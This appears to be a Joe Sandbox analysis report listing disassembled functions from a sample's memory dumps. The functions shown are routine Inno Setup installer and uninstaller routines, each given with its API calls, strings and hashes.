                                                                          • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                          • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2868493918.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.2868472129.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2868511858.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                          • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00456200 Relevance: 49.2, APIs: 11, Strings: 17, Instructions: 237filesynchronizationprocessCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateMutexA.KERNEL32(00493A74,00000001,00000000,00000000,00456535,?,?,?,00000001,?,0045674F,00000000,00456765,?,00000000,00494628), ref: 0045624D
                                                                          • CreateFileMappingA.KERNEL32(000000FF,00493A74,00000004,00000000,00002018,00000000), ref: 00456285
                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045650B,?,00493A74,00000001,00000000,00000000,00456535,?,?,?), ref: 004562AC
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004563B9
                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045650B,?,00493A74,00000001,00000000,00000000,00456535), ref: 00456311
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004563D0
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456409
                                                                          • GetLastError.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045641B
                                                                          • UnmapViewOfFile.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004564ED
                                                                          • CloseHandle.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004564FC
                                                                          • CloseHandle.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456505
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                          • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OgE$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp$egE
                                                                          • API String ID: 4012871263-2037318299
                                                                          • Opcode ID: 2bd007795e1b2ddc76d7ce9a559c48c324d1643155135a6e5ac56ae879ba47b5
                                                                          • Instruction ID: a20c5760107f962147a9319040fdeb0bea2bc75d6d5764986410e607720027f7
                                                                          • Opcode Fuzzy Hash: 2bd007795e1b2ddc76d7ce9a559c48c324d1643155135a6e5ac56ae879ba47b5
                                                                          • Instruction Fuzzy Hash: E9916270E002199BDB10EFA9C845B9EB7B4FB08305F91856AF814EB393D7789948CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041F088 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                          • SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                          • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                          • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                          • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                          • FreeLibrary.KERNEL32(00000001,?,00418F60,00000000,?,?,?,00000001), ref: 0041F1DF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                          • API String ID: 2323315520-3614243559
                                                                          • Opcode ID: 3dbd376a422217cd60190c6702d938cf0380dd97f6cabc27e0354af46de27ebb
                                                                          • Instruction ID: 815e8fcf402ef61c9757a0b1c257229fab3912ba39737af4d7c4dcf1902ae053
                                                                          • Opcode Fuzzy Hash: 3dbd376a422217cd60190c6702d938cf0380dd97f6cabc27e0354af46de27ebb
                                                                          • Instruction Fuzzy Hash: 75311EB1600740EBDF10EFB5EC8AA653294B76E729745093BB108DB1A2D77C498ACB1C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00490F4C Relevance: 35.5, APIs: 3, Strings: 17, Instructions: 486COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Install was done in 64-bit mode but not running 64-bit Windows now, xrefs: 00491215
                                                                          • utCompiledCode[1] is invalid, xrefs: 004911DB
                                                                          • Uninstall, xrefs: 00490FD7
                                                                          • Uninstall DAT: , xrefs: 00491051
                                                                          • DeinitializeUninstall, xrefs: 004916A4
                                                                          • Original Uninstall EXE: , xrefs: 0049102E
                                                                          • InitializeUninstall, xrefs: 0049135A
                                                                          • Will restart because UninstallNeedRestart returned True., xrefs: 004914EA
                                                                          • InitializeUninstall returned False; aborting., xrefs: 00491392
                                                                          • Uninstall command line: , xrefs: 00491074
                                                                          • Not calling UninstallNeedRestart because a restart has already been deemed necessary., xrefs: 00491519
                                                                          • Setup version: Inno Setup version 5.3.4 (a), xrefs: 00491024
                                                                          • Removed all? %s, xrefs: 00491464
                                                                          • Cannot find utCompiledCode record for this version of the uninstaller, xrefs: 004911A0
                                                                          • UninstallNeedRestart, xrefs: 0049149A, 004914D3
                                                                          • Need to restart Windows? %s, xrefs: 0049153B
                                                                          • Will not restart Windows automatically., xrefs: 0049160E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Show
                                                                          • String ID: Cannot find utCompiledCode record for this version of the uninstaller$DeinitializeUninstall$InitializeUninstall$InitializeUninstall returned False; aborting.$Install was done in 64-bit mode but not running 64-bit Windows now$Need to restart Windows? %s$Not calling UninstallNeedRestart because a restart has already been deemed necessary.$Original Uninstall EXE: $Removed all? %s$Setup version: Inno Setup version 5.3.4 (a)$Uninstall$Uninstall DAT: $Uninstall command line: $UninstallNeedRestart$Will not restart Windows automatically.$Will restart because UninstallNeedRestart returned True.$utCompiledCode[1] is invalid
                                                                          • API String ID: 3609083571-540932686
                                                                          • Opcode ID: 95845ce58dd33b11270f0bcad1ef958447a36d73fe786c218c0066e2c8b8b3eb
                                                                          • Instruction ID: 59b7c036a03d461677562de2f337d543927cbba062a10b008de86d2ad0bb5db2
                                                                          • Opcode Fuzzy Hash: 95845ce58dd33b11270f0bcad1ef958447a36d73fe786c218c0066e2c8b8b3eb
                                                                          • Instruction Fuzzy Hash: CB12A170A00645AFDB12EB66E852B5E7FB1AB55308F20847BF8009B3A2C67C9D45CB5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041C97C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,0041A8B4,?), ref: 0041C9B0
                                                                          • 73A24C40.GDI32(?,00000000,?,0041A8B4,?), ref: 0041C9BC
                                                                          • 73A26180.GDI32(0041A8B4,?,00000001,00000001,00000000,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9E0
                                                                          • 73A24C00.GDI32(?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9F0
                                                                          • SelectObject.GDI32(0041CDAC,00000000), ref: 0041CA0B
                                                                          • FillRect.USER32(0041CDAC,?,?), ref: 0041CA46
                                                                          • SetTextColor.GDI32(0041CDAC,00000000), ref: 0041CA5B
                                                                          • SetBkColor.GDI32(0041CDAC,00000000), ref: 0041CA72
                                                                          • PatBlt.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00FF0062), ref: 0041CA88
                                                                          • 73A24C40.GDI32(?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4), ref: 0041CA9B
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041CACC
                                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4), ref: 0041CAE4
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?), ref: 0041CAED
                                                                          • 73A18830.GDI32(0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CAFC
                                                                          • 73A122A0.GDI32(0041CDAC,0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CB05
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041CB1E
                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0041CB35
                                                                          • 73A24D40.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CB7A,?,?,00000000), ref: 0041CB51
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041CB5E
                                                                          • DeleteDC.GDI32(00000000), ref: 0041CB74
                                                                            • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                          • String ID:
                                                                          • API String ID: 1381628555-0
                                                                          • Opcode ID: 6ab65edd8240ed20f794eacf0d63e1bb21ecde25595e2e73ad3d3ae3dbff455f
                                                                          • Instruction ID: 7128b10ae0d2f5501f58bad1f60f679124a592cf14607d549707b49f1954e982
                                                                          • Opcode Fuzzy Hash: 6ab65edd8240ed20f794eacf0d63e1bb21ecde25595e2e73ad3d3ae3dbff455f
                                                                          • Instruction Fuzzy Hash: 5961FC71A44609ABDF10EBE5DC86FAFB7B8EF48704F10446AF504E7281C67CA9418B69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042DEBC Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DEF6
                                                                          • GetVersion.KERNEL32(00000000,0042E0A0,?,00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF13
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E0A0,?,00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF2C
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DF32
                                                                          • FreeSid.ADVAPI32(00000000,0042E0A7,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E09A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAllocateFreeHandleInitializeModuleProcVersion
                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                          • API String ID: 1717332306-1888249752
                                                                          • Opcode ID: 9c2d92618089c045db7cc45444b4b39a9e3eeaabf2cdbb16aadbda0d4b0e740e
                                                                          • Instruction ID: b47b297bded1d11ddf8dbbdf8866b420117faccba79691f7cf002b7c56945d2e
                                                                          • Opcode Fuzzy Hash: 9c2d92618089c045db7cc45444b4b39a9e3eeaabf2cdbb16aadbda0d4b0e740e
                                                                          • Instruction Fuzzy Hash: 0E51B471B44629AEDB10EAE69C42F7F77ECEB09304F94447BB500E7282C5BC9905866D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004921E8 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000,?,004928C1,00000000,004928CB,?,00000000), ref: 0049226B
                                                                          • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000,?,004928C1,00000000), ref: 0049227E
                                                                          • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000), ref: 0049228E
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004922AF
                                                                          • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000), ref: 004922BF
                                                                            • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00491C7C,00000000,00491E45,?,?,00000005), ref: 0042D35D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                          • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                          • API String ID: 2000705611-3672972446
                                                                          • Opcode ID: 06a7ed08dbf674a2667a05d703fd75933f08328fa6a844e0e79dc1aa1c7f5483
                                                                          • Instruction ID: 3aaa1206ea96c942a1dc7cc704d64c74666df5688c5e5e951628029b4c51e49f
                                                                          • Opcode Fuzzy Hash: 06a7ed08dbf674a2667a05d703fd75933f08328fa6a844e0e79dc1aa1c7f5483
                                                                          • Instruction Fuzzy Hash: A791C330A04204BFDF11EBA5C956BAF7BA4EB49314F924477F800AB392D6BC9C05CB19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00458A2C Relevance: 21.2, APIs: 2, Strings: 10, Instructions: 199COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00458CC6,?,?,?,?,?,00000006,?,00000000,00491717,?,00000000,004917BA), ref: 00458B78
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: .chm$.chw$.fts$.gid$.hlp$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                          • API String ID: 1452528299-1593206319
                                                                          • Opcode ID: fab1801c83719b401dae8279acafb6f3c72adbd90b51be916231b55248e2b9b3
                                                                          • Instruction ID: c0b81f7498e5b7e500974e5393cbc04c1f71ed909e083ee47f99453e8a5d0863
                                                                          • Opcode Fuzzy Hash: fab1801c83719b401dae8279acafb6f3c72adbd90b51be916231b55248e2b9b3
                                                                          • Instruction Fuzzy Hash: 11616C30B002445BDB11EB6998827AE7BA5AB49719F50846FF801EB383DF789D09C769
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041B31C Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B333
                                                                          • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B33D
                                                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B34F
                                                                          • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B366
                                                                          • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B372
                                                                          • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B39F
                                                                          • 73A1A480.USER32(00000000,00000000,0041B3D2,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                          • DeleteDC.GDI32(?), ref: 0041B449
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                          • String ID:
                                                                          • API String ID: 359944910-0
                                                                          • Opcode ID: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                          • Instruction ID: ef99a8f9a6f00624a9096b2aeeb37702e3b70ceb3a8cbf3cb68c8f3869cb2bd7
                                                                          • Opcode Fuzzy Hash: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                          • Instruction Fuzzy Hash: 1541D071E40619AFDF10DAE9D846FEFB7BCEF08704F104466B614FB281C67869408BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046E3C8 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0046E55B
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046E64E
                                                                          • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0046E664
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046E689
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                          • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                          • API String ID: 971782779-3668018701
                                                                          • Opcode ID: 7233d68e5e0cd7d80ba07986dc8d0c7cf2e1d0277f99ac3aa031ea8fdea09f1a
                                                                          • Instruction ID: dad63e880d71d64191cbb6a8ee4696ca6eb4502e54dc837f5c65c8de11b949a7
                                                                          • Opcode Fuzzy Hash: 7233d68e5e0cd7d80ba07986dc8d0c7cf2e1d0277f99ac3aa031ea8fdea09f1a
                                                                          • Instruction Fuzzy Hash: A5D13474A00249AFDB01EF99D885BDEBBF5AF08314F54402AF800B7391D778AE45CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004530B4 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,?,00000000,?,00000000,0045334D,?,00458E8E,00000003,00000000,00000000,00453384), ref: 004531CD
                                                                            • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                          • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,00000000,?,00000004,00000000,00453297,?,00458E8E,00000000,00000000,?,00000000,?,00000000), ref: 00453251
                                                                          • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,00000000,?,00000004,00000000,00453297,?,00458E8E,00000000,00000000,?,00000000,?,00000000), ref: 00453280
                                                                          Strings
                                                                          • , xrefs: 0045313E
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453124
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004530EB
                                                                          • RegOpenKeyEx, xrefs: 00453150
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$FormatMessageOpen
                                                                          • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
